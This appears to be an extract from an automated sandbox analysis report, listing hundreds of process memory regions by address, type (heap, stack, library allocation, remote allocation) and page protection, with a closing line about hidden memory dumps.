|
page read and write
|
||
|
5450000
|
trusted library allocation
|
page read and write
|
||
|
19FF41A5000
|
heap
|
page read and write
|
||
|
250847F0000
|
trusted library allocation
|
page read and write
|
||
|
50BE000
|
trusted library allocation
|
page read and write
|
||
|
250FF2BD000
|
heap
|
page read and write
|
||
|
7FFD346D0000
|
trusted library allocation
|
page read and write
|
||
|
19FF4039000
|
heap
|
page read and write
|
||
|
19FF4096000
|
heap
|
page read and write
|
||
|
25084880000
|
trusted library allocation
|
page read and write
|
||
|
25084842000
|
heap
|
page read and write
|
||
|
25084800000
|
heap
|
page read and write
|
||
|
18821BD0000
|
heap
|
page execute and read and write
|
||
|
250FF278000
|
heap
|
page read and write
|
||
|
7CA000
|
stack
|
page read and write
|
||
|
1883B9D8000
|
heap
|
page read and write
|
||
|
25084858000
|
heap
|
page read and write
|
||
|
2A20000
|
heap
|
page execute and read and write
|
||
|
5120000
|
trusted library allocation
|
page execute and read and write
|
||
|
729E000
|
stack
|
page read and write
|
||
|
2068205E000
|
heap
|
page read and write
|
||
|
1943E12B000
|
trusted library allocation
|
page read and write
|
||
|
712C23E000
|
stack
|
page read and write
|
||
|
5140000
|
trusted library allocation
|
page read and write
|
||
|
BE982FE000
|
unkown
|
page readonly
|
||
|
18823A2F000
|
trusted library allocation
|
page read and write
|
||
|
28C0000
|
heap
|
page read and write
|
||
|
18823B8F000
|
trusted library allocation
|
page read and write
|
||
|
712BAFE000
|
stack
|
page read and write
|
||
|
2068203B000
|
heap
|
page read and write
|
||
|
287E000
|
stack
|
page read and write
|
||
|
1943A331000
|
trusted library allocation
|
page read and write
|
||
|
19FF5DDB000
|
heap
|
page read and write
|
||
|
712B7F3000
|
stack
|
page read and write
|
||
|
849333F000
|
stack
|
page read and write
|
||
|
1943AD81000
|
trusted library allocation
|
page read and write
|
||
|
20682071000
|
heap
|
page read and write
|
||
|
19449F9E000
|
trusted library allocation
|
page read and write
|
||
|
4F9E000
|
stack
|
page read and write
|
||
|
19FF4089000
|
heap
|
page read and write
|
||
|
1883B9E0000
|
heap
|
page read and write
|
||
|
1943F23E000
|
trusted library allocation
|
page read and write
|
||
|
19439D7E000
|
heap
|
page read and write
|
||
|
28BB000
|
stack
|
page read and write
|
||
|
19FF4130000
|
heap
|
page read and write
|
||
|
6A7497E000
|
stack
|
page read and write
|
||
|
BE985FB000
|
stack
|
page read and write
|
||
|
18821AB1000
|
heap
|
page read and write
|
||
|
7FF6975AE000
|
unkown
|
page readonly
|
||
|
7FFD34423000
|
trusted library allocation
|
page execute and read and write
|
||
|
6D80000
|
heap
|
page read and write
|
||
|
B50000
|
heap
|
page read and write
|
||
|
2068205A000
|
heap
|
page read and write
|
||
|
7FFD34430000
|
trusted library allocation
|
page read and write
|
||
|
19FF5DE2000
|
heap
|
page read and write
|
||
|
7FFD34640000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34670000
|
trusted library allocation
|
page read and write
|
||
|
1943DEED000
|
trusted library allocation
|
page read and write
|
||
|
D72000
|
heap
|
page read and write
|
||
|
6EDE000
|
stack
|
page read and write
|
||
|
2A5F000
|
trusted library allocation
|
page read and write
|
||
|
250FFC91000
|
trusted library allocation
|
page read and write
|
||
|
194384F0000
|
heap
|
page read and write
|
||
|
188239FC000
|
trusted library allocation
|
page read and write
|
||
|
1943EC6E000
|
trusted library allocation
|
page read and write
|
||
|
25080300000
|
trusted library section
|
page readonly
|
||
|
E10000
|
heap
|
page read and write
|
||
|
25080661000
|
trusted library allocation
|
page read and write
|
||
|
18821A05000
|
heap
|
page read and write
|
||
|
194382D1000
|
heap
|
page read and write
|
||
|
1883BE20000
|
heap
|
page read and write
|
||
|
4F20000
|
trusted library section
|
page read and write
|
||
|
2812000
|
trusted library allocation
|
page read and write
|
||
|
20682036000
|
heap
|
page read and write
|
||
|
250FFA15000
|
heap
|
page read and write
|
||
|
BE981F9000
|
stack
|
page read and write
|
||
|
19FF41A8000
|
heap
|
page read and write
|
||
|
1943E0F4000
|
trusted library allocation
|
page read and write
|
||
|
19438480000
|
trusted library allocation
|
page read and write
|
||
|
8492F79000
|
stack
|
page read and write
|
||
|
250FFB5B000
|
heap
|
page read and write
|
||
|
2810000
|
trusted library allocation
|
page read and write
|
||
|
20681FF0000
|
heap
|
page read and write
|
||
|
2830000
|
trusted library allocation
|
page read and write
|
||
|
2068205C000
|
heap
|
page read and write
|
||
|
2C4F000
|
trusted library allocation
|
page read and write
|
||
|
1883BA90000
|
heap
|
page read and write
|
||
|
442000
|
remote allocation
|
page execute and read and write
|
||
|
250FFA00000
|
heap
|
page read and write
|
||
|
2068205E000
|
heap
|
page read and write
|
||
|
1943F3C8000
|
trusted library allocation
|
page read and write
|
||
|
250FFB00000
|
heap
|
page read and write
|
||
|
20683D33000
|
heap
|
page read and write
|
||
|
250FF880000
|
trusted library allocation
|
page read and write
|
||
|
5115000
|
trusted library allocation
|
page read and write
|
||
|
5620000
|
trusted library allocation
|
page read and write
|
||
|
19449F31000
|
trusted library allocation
|
page read and write
|
||
|
712BE7E000
|
stack
|
page read and write
|
||
|
7FFD3442D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34660000
|
trusted library allocation
|
page read and write
|
||
|
1944AC27000
|
trusted library allocation
|
page read and write
|
||
|
8570FFE000
|
stack
|
page read and write
|
||
|
25084AC0000
|
remote allocation
|
page read and write
|
||
|
1943C23A000
|
trusted library allocation
|
page read and write
|
||
|
25084A70000
|
trusted library allocation
|
page read and write
|
||
|
20682071000
|
heap
|
page read and write
|
||
|
1943A37F000
|
trusted library allocation
|
page read and write
|
||
|
19FF40B6000
|
heap
|
page read and write
|
||
|
250848E2000
|
heap
|
page read and write
|
||
|
19FF40FD000
|
heap
|
page read and write
|
||
|
18821B3F000
|
heap
|
page read and write
|
||
|
19FF40D0000
|
heap
|
page read and write
|
||
|
19FF40A0000
|
heap
|
page read and write
|
||
|
19439F20000
|
heap
|
page read and write
|
||
|
450000
|
remote allocation
|
page execute and read and write
|
||
|
BE9887E000
|
stack
|
page read and write
|
||
|
194384B0000
|
heap
|
page readonly
|
||
|
50F0000
|
trusted library allocation
|
page read and write
|
||
|
1943F15D000
|
trusted library allocation
|
page read and write
|
||
|
2068202F000
|
heap
|
page read and write
|
||
|
19FF40BB000
|
heap
|
page read and write
|
||
|
2817000
|
trusted library allocation
|
page execute and read and write
|
||
|
53A8000
|
heap
|
page read and write
|
||
|
19FF40B3000
|
heap
|
page read and write
|
||
|
50AB000
|
trusted library allocation
|
page read and write
|
||
|
25085000000
|
heap
|
page read and write
|
||
|
1883B937000
|
heap
|
page read and write
|
||
|
85709FF000
|
stack
|
page read and write
|
||
|
19449F61000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345DA000
|
trusted library allocation
|
page read and write
|
||
|
DB4000
|
heap
|
page read and write
|
||
|
19FF3F30000
|
heap
|
page read and write
|
||
|
712BDFE000
|
stack
|
page read and write
|
||
|
20682175000
|
heap
|
page read and write
|
||
|
19FF40B7000
|
heap
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
D3B000
|
heap
|
page read and write
|
||
|
3A31000
|
trusted library allocation
|
page read and write
|
||
|
560E000
|
stack
|
page read and write
|
||
|
250FF200000
|
heap
|
page read and write
|
||
|
7FFD34422000
|
trusted library allocation
|
page read and write
|
||
|
BE993FC000
|
stack
|
page read and write
|
||
|
188238E0000
|
trusted library allocation
|
page read and write
|
||
|
20682068000
|
heap
|
page read and write
|
||
|
19439FB6000
|
trusted library allocation
|
page read and write
|
||
|
54B0000
|
trusted library section
|
page readonly
|
||
|
BE97EFE000
|
unkown
|
page readonly
|
||
|
25084721000
|
trusted library allocation
|
page read and write
|
||
|
28E0000
|
trusted library allocation
|
page read and write
|
||
|
188239F4000
|
trusted library allocation
|
page read and write
|
||
|
19FF40A9000
|
heap
|
page read and write
|
||
|
19438200000
|
heap
|
page read and write
|
||
|
7FFD34540000
|
trusted library allocation
|
page execute and read and write
|
||
|
2068202F000
|
heap
|
page read and write
|
||
|
6A7487B000
|
stack
|
page read and write
|
||
|
19FF40BA000
|
heap
|
page read and write
|
||
|
BE9897E000
|
stack
|
page read and write
|
||
|
250848EF000
|
heap
|
page read and write
|
||
|
7FF6975A9000
|
unkown
|
page readonly
|
||
|
7FFD344E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
19439F31000
|
trusted library allocation
|
page read and write
|
||
|
19FF40B2000
|
heap
|
page read and write
|
||
|
19FF5DE2000
|
heap
|
page read and write
|
||
|
1943FB10000
|
trusted library allocation
|
page read and write
|
||
|
19438230000
|
heap
|
page read and write
|
||
|
2068217B000
|
heap
|
page read and write
|
||
|
5500000
|
heap
|
page read and write
|
||
|
20683F30000
|
trusted library allocation
|
page read and write
|
||
|
BE986FE000
|
unkown
|
page readonly
|
||
|
1944A227000
|
trusted library allocation
|
page read and write
|
||
|
25084764000
|
trusted library allocation
|
page read and write
|
||
|
BE9927E000
|
stack
|
page read and write
|
||
|
535C000
|
heap
|
page read and write
|
||
|
725E000
|
stack
|
page read and write
|
||
|
CE0000
|
trusted library allocation
|
page read and write
|
||
|
5180000
|
heap
|
page read and write
|
||
|
1883BBBB000
|
heap
|
page read and write
|
||
|
188238CD000
|
trusted library allocation
|
page read and write
|
||
|
19FF409E000
|
heap
|
page read and write
|
||
|
BE9877E000
|
stack
|
page read and write
|
||
|
250802D0000
|
trusted library section
|
page readonly
|
||
|
1943E0F9000
|
trusted library allocation
|
page read and write
|
||
|
8492E7E000
|
stack
|
page read and write
|
||
|
90BF000
|
stack
|
page read and write
|
||
|
7FFD34650000
|
trusted library allocation
|
page read and write
|
||
|
20681FD0000
|
heap
|
page read and write
|
||
|
19FF40BB000
|
heap
|
page read and write
|
||
|
25084750000
|
trusted library allocation
|
page read and write
|
||
|
8493E8B000
|
stack
|
page read and write
|
||
|
19439D64000
|
heap
|
page read and write
|
||
|
715E000
|
stack
|
page read and write
|
||
|
1883BB70000
|
heap
|
page execute and read and write
|
||
|
7FFD346A0000
|
trusted library allocation
|
page read and write
|
||
|
19FF41AC000
|
heap
|
page read and write
|
||
|
18821AD9000
|
heap
|
page read and write
|
||
|
250848FC000
|
heap
|
page read and write
|
||
|
25080690000
|
trusted library allocation
|
page read and write
|
||
|
BE97CFE000
|
unkown
|
page readonly
|
||
|
18823A04000
|
trusted library allocation
|
page read and write
|
||
|
19FF40C1000
|
heap
|
page read and write
|
||
|
50C6000
|
trusted library allocation
|
page read and write
|
||
|
19FF5DE2000
|
heap
|
page read and write
|
||
|
18821A91000
|
heap
|
page read and write
|
||
|
25084A00000
|
trusted library allocation
|
page read and write
|
||
|
8570DFF000
|
stack
|
page read and write
|
||
|
19FF40D0000
|
heap
|
page read and write
|
||
|
1944BD91000
|
trusted library allocation
|
page read and write
|
||
|
25084690000
|
trusted library allocation
|
page read and write
|
||
|
19FF409E000
|
heap
|
page read and write
|
||
|
18821A10000
|
heap
|
page read and write
|
||
|
2508491B000
|
heap
|
page read and write
|
||
|
84933BB000
|
stack
|
page read and write
|
||
|
280F000
|
stack
|
page read and write
|
||
|
6D8E000
|
heap
|
page read and write
|
||
|
54F0000
|
trusted library allocation
|
page read and write
|
||
|
19FF40D0000
|
heap
|
page read and write
|
||
|
18823896000
|
trusted library allocation
|
page read and write
|
||
|
19FF4010000
|
heap
|
page read and write
|
||
|
CF8000
|
heap
|
page read and write
|
||
|
20682037000
|
heap
|
page read and write
|
||
|
18823603000
|
trusted library allocation
|
page read and write
|
||
|
50E0000
|
trusted library allocation
|
page read and write
|
||
|
19439D00000
|
trusted library allocation
|
page read and write
|
||
|
1944A1F0000
|
trusted library allocation
|
page read and write
|
||
|
712BC7D000
|
stack
|
page read and write
|
||
|
8492DFE000
|
stack
|
page read and write
|
||
|
1944BD8E000
|
trusted library allocation
|
page read and write
|
||
|
25084720000
|
trusted library allocation
|
page read and write
|
||
|
BE994FE000
|
unkown
|
page readonly
|
||
|
2068205E000
|
heap
|
page read and write
|
||
|
712BBFF000
|
stack
|
page read and write
|
||
|
19FF4103000
|
heap
|
page read and write
|
||
|
1943FAB5000
|
trusted library allocation
|
page read and write
|
||
|
25084AC0000
|
remote allocation
|
page read and write
|
||
|
45E000
|
remote allocation
|
page execute and read and write
|
||
|
1883BA2E000
|
heap
|
page read and write
|
||
|
2508477E000
|
trusted library allocation
|
page read and write
|
||
|
1943FB37000
|
trusted library allocation
|
page read and write
|
||
|
2BF3000
|
trusted library allocation
|
page read and write
|
||
|
18821A00000
|
heap
|
page read and write
|
||
|
194382DA000
|
heap
|
page read and write
|
||
|
1943FAD0000
|
trusted library allocation
|
page read and write
|
||
|
6FDE000
|
stack
|
page read and write
|
||
|
2A62000
|
trusted library allocation
|
page read and write
|
||
|
19449F4E000
|
trusted library allocation
|
page read and write
|
||
|
8492FBE000
|
stack
|
page read and write
|
||
|
250802C0000
|
trusted library section
|
page readonly
|
||
|
2AA3000
|
trusted library allocation
|
page read and write
|
||
|
1883B983000
|
heap
|
page read and write
|
||
|
50E9000
|
trusted library allocation
|
page read and write
|
||
|
18821A9B000
|
heap
|
page read and write
|
||
|
7FFD346E0000
|
trusted library allocation
|
page read and write
|
||
|
402000
|
remote allocation
|
page execute and read and write
|
||
|
BE97DFE000
|
stack
|
page read and write
|
||
|
188334F0000
|
trusted library allocation
|
page read and write
|
||
|
19439D60000
|
heap
|
page read and write
|
||
|
54D0000
|
heap
|
page read and write
|
||
|
712BD7E000
|
stack
|
page read and write
|
||
|
1943A381000
|
trusted library allocation
|
page read and write
|
||
|
5170000
|
heap
|
page read and write
|
||
|
6A74A7F000
|
stack
|
page read and write
|
||
|
194384C0000
|
trusted library allocation
|
page read and write
|
||
|
1944B627000
|
trusted library allocation
|
page read and write
|
||
|
1943F0BF000
|
trusted library allocation
|
page read and write
|
||
|
25084760000
|
trusted library allocation
|
page read and write
|
||
|
1944BD75000
|
trusted library allocation
|
page read and write
|
||
|
2068205C000
|
heap
|
page read and write
|
||
|
25084A50000
|
trusted library allocation
|
page read and write
|
||
|
25084710000
|
trusted library allocation
|
page read and write
|
||
|
1944BD83000
|
trusted library allocation
|
page read and write
|
||
|
19FF4100000
|
heap
|
page read and write
|
||
|
701E000
|
stack
|
page read and write
|
||
|
7FFD34710000
|
trusted library allocation
|
page read and write
|
||
|
25084A60000
|
trusted library allocation
|
page read and write
|
||
|
250FF22B000
|
heap
|
page read and write
|
||
|
25084740000
|
trusted library allocation
|
page read and write
|
||
|
509E000
|
stack
|
page read and write
|
||
|
19FF40D0000
|
heap
|
page read and write
|
||
|
1944A1ED000
|
trusted library allocation
|
page read and write
|
||
|
250FF28D000
|
heap
|
page read and write
|
||
|
281B000
|
trusted library allocation
|
page execute and read and write
|
||
|
1943F7BA000
|
trusted library allocation
|
page read and write
|
||
|
5C00000
|
heap
|
page read and write
|
||
|
25084821000
|
heap
|
page read and write
|
||
|
19FF40A5000
|
heap
|
page read and write
|
||
|
19438290000
|
heap
|
page read and write
|
||
|
84931BE000
|
stack
|
page read and write
|
||
|
BE996FE000
|
unkown
|
page readonly
|
||
|
7FFD345E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
25084AC0000
|
remote allocation
|
page read and write
|
||
|
7FF6975A1000
|
unkown
|
page execute read
|
||
|
19FF41AB000
|
heap
|
page read and write
|
||
|
1944A21D000
|
trusted library allocation
|
page read and write
|
||
|
8492EFE000
|
stack
|
page read and write
|
||
|
194384A0000
|
trusted library allocation
|
page read and write
|
||
|
194382A5000
|
heap
|
page read and write
|
||
|
19438210000
|
heap
|
page read and write
|
||
|
6A749FE000
|
stack
|
page read and write
|
||
|
250FF990000
|
trusted library section
|
page read and write
|
||
|
20683C60000
|
heap
|
page read and write
|
||
|
7FF6975A0000
|
unkown
|
page readonly
|
||
|
B30000
|
heap
|
page read and write
|
||
|
18821B80000
|
heap
|
page readonly
|
||
|
18823550000
|
trusted library allocation
|
page read and write
|
||
|
20686197000
|
heap
|
page read and write
|
||
|
7FF6975AC000
|
unkown
|
page write copy
|
||
|
7FFD34700000
|
trusted library allocation
|
page read and write
|
||
|
250FF25B000
|
heap
|
page read and write
|
||
|
25084750000
|
trusted library allocation
|
page read and write
|
||
|
19FF406F000
|
heap
|
page read and write
|
||
|
19438388000
|
heap
|
page read and write
|
||
|
19FF40D0000
|
heap
|
page read and write
|
||
|
BE98FFE000
|
unkown
|
page readonly
|
||
|
7FFD346C0000
|
trusted library allocation
|
page read and write
|
||
|
18821A50000
|
heap
|
page read and write
|
||
|
5100000
|
trusted library allocation
|
page read and write
|
||
|
7FF6975A1000
|
unkown
|
page execute read
|
||
|
712BEBE000
|
stack
|
page read and write
|
||
|
1883BA57000
|
heap
|
page execute and read and write
|
||
|
50AE000
|
trusted library allocation
|
page read and write
|
||
|
25084861000
|
heap
|
page read and write
|
||
|
7FF6975AC000
|
unkown
|
page read and write
|
||
|
50D2000
|
trusted library allocation
|
page read and write
|
||
|
1943FCCF000
|
trusted library allocation
|
page read and write
|
||
|
712C2BB000
|
stack
|
page read and write
|
||
|
1943CC3A000
|
trusted library allocation
|
page read and write
|
||
|
18821C45000
|
heap
|
page read and write
|
||
|
19FF40A4000
|
heap
|
page read and write
|
||
|
20682076000
|
heap
|
page read and write
|
||
|
19FF4030000
|
heap
|
page read and write
|
||
|
250847F0000
|
trusted library allocation
|
page read and write
|
||
|
19FF40C2000
|
heap
|
page read and write
|
||
|
849400E000
|
stack
|
page read and write
|
||
|
7FFD34610000
|
trusted library allocation
|
page execute and read and write
|
||
|
54C0000
|
heap
|
page read and write
|
||
|
2BEB000
|
trusted library allocation
|
page read and write
|
||
|
19FF5DD1000
|
heap
|
page read and write
|
||
|
250FF272000
|
heap
|
page read and write
|
||
|
19FF4110000
|
heap
|
page read and write
|
||
|
3A55000
|
trusted library allocation
|
page read and write
|
||
|
711E000
|
stack
|
page read and write
|
||
|
18821B33000
|
heap
|
page read and write
|
||
|
2068205C000
|
heap
|
page read and write
|
||
|
250FF27C000
|
heap
|
page read and write
|
||
|
7FFD344D6000
|
trusted library allocation
|
page read and write
|
||
|
1943E607000
|
trusted library allocation
|
page read and write
|
||
|
2A7E000
|
trusted library allocation
|
page read and write
|
||
|
19439EF0000
|
heap
|
page execute and read and write
|
||
|
CF0000
|
heap
|
page read and write
|
||
|
20685F97000
|
heap
|
page read and write
|
||
|
B56000
|
heap
|
page read and write
|
||
|
8492D7A000
|
stack
|
page read and write
|
||
|
250848BE000
|
heap
|
page read and write
|
||
|
BE98CFE000
|
unkown
|
page readonly
|
||
|
BE98C7E000
|
stack
|
page read and write
|
||
|
250FF294000
|
heap
|
page read and write
|
||
|
7FFD345F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
BE98F7E000
|
stack
|
page read and write
|
||
|
250FF2FF000
|
heap
|
page read and write
|
||
|
25084854000
|
heap
|
page read and write
|
||
|
7FFD34720000
|
trusted library allocation
|
page read and write
|
||
|
1883BA50000
|
heap
|
page execute and read and write
|
||
|
1943F4D8000
|
trusted library allocation
|
page read and write
|
||
|
250FFB02000
|
heap
|
page read and write
|
||
|
7FFD34690000
|
trusted library allocation
|
page read and write
|
||
|
1943F794000
|
trusted library allocation
|
page read and write
|
||
|
1943E10F000
|
trusted library allocation
|
page read and write
|
||
|
19438270000
|
heap
|
page read and write
|
||
|
250FF313000
|
heap
|
page read and write
|
||
|
54E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1944A1F9000
|
trusted library allocation
|
page read and write
|
||
|
250FF240000
|
heap
|
page read and write
|
||
|
1882360D000
|
trusted library allocation
|
page read and write
|
||
|
194382CD000
|
heap
|
page read and write
|
||
|
2508482E000
|
heap
|
page read and write
|
||
|
194382EF000
|
heap
|
page read and write
|
||
|
188219C0000
|
heap
|
page read and write
|
||
|
BE980FE000
|
unkown
|
page readonly
|
||
|
20682033000
|
heap
|
page read and write
|
||
|
7FFD34506000
|
trusted library allocation
|
page execute and read and write
|
||
|
20682170000
|
heap
|
page read and write
|
||
|
250801E0000
|
trusted library allocation
|
page read and write
|
||
|
250848B9000
|
heap
|
page read and write
|
||
|
1943A15A000
|
trusted library allocation
|
page read and write
|
||
|
1883B930000
|
heap
|
page read and write
|
||
|
1944A218000
|
trusted library allocation
|
page read and write
|
||
|
19FF5DD7000
|
heap
|
page read and write
|
||
|
7FFD346B0000
|
trusted library allocation
|
page read and write
|
||
|
188219A0000
|
heap
|
page read and write
|
||
|
4BCC000
|
stack
|
page read and write
|
||
|
1943A323000
|
trusted library allocation
|
page read and write
|
||
|
BE98B7E000
|
stack
|
page read and write
|
||
|
19449F4B000
|
trusted library allocation
|
page read and write
|
||
|
D04000
|
trusted library allocation
|
page read and write
|
||
|
5368000
|
heap
|
page read and write
|
||
|
25084720000
|
trusted library allocation
|
page read and write
|
||
|
1943FADE000
|
trusted library allocation
|
page read and write
|
||
|
7FFD345C0000
|
trusted library allocation
|
page read and write
|
||
|
712BB7E000
|
stack
|
page read and write
|
||
|
7FFD34740000
|
trusted library allocation
|
page read and write
|
||
|
D65000
|
heap
|
page read and write
|
||
|
1943F39B000
|
trusted library allocation
|
page read and write
|
||
|
1943FA6E000
|
trusted library allocation
|
page read and write
|
||
|
8492C7E000
|
stack
|
page read and write
|
||
|
18823B84000
|
trusted library allocation
|
page read and write
|
||
|
85712FC000
|
stack
|
page read and write
|
||
|
1943A35B000
|
trusted library allocation
|
page read and write
|
||
|
7FFD346F0000
|
trusted library allocation
|
page read and write
|
||
|
D00000
|
trusted library allocation
|
page read and write
|
||
|
18821B3C000
|
heap
|
page read and write
|
||
|
849313A000
|
stack
|
page read and write
|
||
|
1883B9F9000
|
heap
|
page read and write
|
||
|
2A66000
|
trusted library allocation
|
page read and write
|
||
|
B40000
|
heap
|
page read and write
|
||
|
2508490B000
|
heap
|
page read and write
|
||
|
85710FE000
|
stack
|
page read and write
|
||
|
250802E0000
|
trusted library section
|
page readonly
|
||
|
19439E90000
|
heap
|
page execute and read and write
|
||
|
19FF40AD000
|
heap
|
page read and write
|
||
|
D2A000
|
trusted library allocation
|
page execute and read and write
|
||
|
18823609000
|
trusted library allocation
|
page read and write
|
||
|
CCE000
|
stack
|
page read and write
|
||
|
2068205E000
|
heap
|
page read and write
|
||
|
2068205B000
|
heap
|
page read and write
|
||
|
50A4000
|
trusted library allocation
|
page read and write
|
||
|
5360000
|
heap
|
page read and write
|
||
|
18821ADE000
|
heap
|
page read and write
|
||
|
19439CA0000
|
trusted library section
|
page read and write
|
||
|
25084903000
|
heap
|
page read and write
|
||
|
20682010000
|
heap
|
page read and write
|
||
|
2068205A000
|
heap
|
page read and write
|
||
|
BE99C7E000
|
stack
|
page read and write
|
||
|
85708FA000
|
stack
|
page read and write
|
||
|
250FF2B6000
|
heap
|
page read and write
|
||
|
7FF6975A9000
|
unkown
|
page readonly
|
||
|
7FFD34620000
|
trusted library allocation
|
page read and write
|
||
|
19FF40A3000
|
heap
|
page read and write
|
||
|
19FF40B7000
|
heap
|
page read and write
|
||
|
50A0000
|
trusted library allocation
|
page read and write
|
||
|
1882357D000
|
trusted library allocation
|
page read and write
|
||
|
1882387F000
|
trusted library allocation
|
page read and write
|
||
|
18821B50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD344DC000
|
trusted library allocation
|
page execute and read and write
|
There are 632 hidden memdumps, click here to show them.